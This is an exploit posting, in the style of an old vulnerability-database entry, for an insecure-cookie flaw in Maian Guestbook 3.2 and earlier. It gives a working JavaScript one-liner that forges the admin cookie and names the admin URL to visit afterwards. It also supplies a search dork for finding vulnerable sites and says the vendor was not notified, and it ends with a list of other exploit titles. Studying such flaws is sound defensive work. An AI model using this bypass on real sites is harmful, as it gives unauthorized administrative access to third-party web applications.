-[*] ================================================================================ [*]-
-[*] Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-
[*] Discovered By: S.W.A.T.
[*] E-Mail: svvateam[at]yahoo[dot]com
[*] Script Download: http://www.maianscriptworld.co.uk
[*] DORK: Powered by Maian Guestbook v3.2
[*] Vendor Has Not Been Notified!
[*] DESCRIPTION:
Maian Guestbook suffers from a insecure cookie, the admin panel only checks if the
cookie exists.
and not the content. so we can easyily craft a cookie and look like a admin.
[*] Vulnerability:
javascript:document.cookie = "gbook_cookie=1; path=/";
[*] NOTE/TIP:
after running the javascript, visit "/admin/index.php" to view admin area.
-[*] ================================================================================ [*]-
-[*] Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-
【Maian Guestbook】相关文章:
★ CodeDB (list.php lang) Local File Inclusion Vulnerability
★ Joomla Component DT Register Remote SQL injection Vulnerability
★ HIOX Random Ad 1.3 Arbitrary Add Admin User Exploit
★ MojoClassifieds 2.0 Remote Blind SQL Injection Exploit
★ Maian Cart 1.1 Insecure Cookie Handling Vulnerability
★ moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit
★ Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit
★ Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit